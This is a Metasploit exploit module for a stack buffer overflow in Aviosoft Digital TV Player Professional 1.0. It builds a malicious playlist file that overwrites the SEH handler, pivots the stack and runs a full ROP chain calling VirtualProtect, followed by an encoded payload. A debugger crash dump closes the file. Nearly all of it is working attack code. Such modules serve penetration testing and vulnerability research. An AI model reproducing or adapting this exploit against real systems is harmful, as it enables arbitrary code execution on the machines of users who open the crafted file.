## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a playlist file on to the stack, which may result aribitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'modpr0be', #Initial discovery, poc 'sinn3r', #Metasploit ], 'References' => [ ['OSVDB', '77043'], ['EDB', '18096'], ], 'Payload' => { 'BadChars' => "\x00\x0a\x1a", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'EXITFUNC' => "seh", }, 'Platform' => 'win', 'Targets' => [ [ 'Aviosoft DTV Player 1.0.1.2', { 'Ret' => 0x6130534a, #Stack pivot (ADD ESP,800; RET) 'Offset' => 612, #Offset to SEH 'Max' => 5000 #Max buffer size } ], ], 'Privileged' => false, 'DisclosureDate' => "Nov 9 2011", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf']) ], self.class) end def junk(n=1) return [rand_text_alpha(4).unpack("L")[0]] * n end def nops(rop=false, n=1) return rop ? [0x61326003] * n : [0x90909090] * n end def exploit rop = [ nops(true, 10), #ROP NOP 0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll) 0x10011108, #ptr to &VirtualProtect 0x64010503, #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll) junk, 0x6160949f, #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll) junk(3), 0x61604218, #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll) junk(3), 0x6403d1a6, #POP EBP # RETN (MediaPlayerCtrl.dll) junk(3), 0x60333560, #& push esp # ret 0c (Configuration.dll) 0x61323EA8, #POP EAX # RETN (DTVDeviceManager.dll) 0xA13977DF, #0x00000343-> ebx 0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll) 0x6163d37b, #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll) 0x61626807, #XOR EAX,EAX # RETN (EPG.dll) 0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll) 0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll) 0xA13974DC, #0x00000040-> edx 0x613107fb, #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll) 0x60326803, #POP ECX # RETN (Configuration.dll) 0x60350340, #&Writable location 0x61329e07, #POP EDI # RETN (DTVDeviceManager.dll) nops(true), #ROP NOP 0x60340178, #POP EAX # RETN nops, #Regular NOPs 0x60322e02 #PUSH # RETN ].flatten.pack("V*") buf = '' buf << rand_text_alpha(target['Offset']-buf.length) buf << [target.ret].pack('V*') buf << rand_text_alpha(136) buf << rop buf << make_nops(32) buf << payload.encoded buf << rand_text_alpha(target['Max']-buf.length) file_create(buf) end end =begin eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000 eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 MediaPlayerCtrl!DllCreateObject+0x220: 6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> !exchain 0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll - DTVDeviceManager+534a (6130534a) Invalid exception stack at 41414141 0:000> !address edi 00130000 : 00130000 - 00003000 Type 00040000 MEM_MAPPED Protect 00000002 PAGE_READONLY State 00001000 MEM_COMMIT Usage RegionUsageIsVAD 0:000> !address esi 047a0000 : 047a0000 - 0000b000 Type 00020000 MEM_PRIVATE Protect 00000004 PAGE_READWRITE State 00001000 MEM_COMMIT Usage RegionUsageHeap Handle 013c0000 =end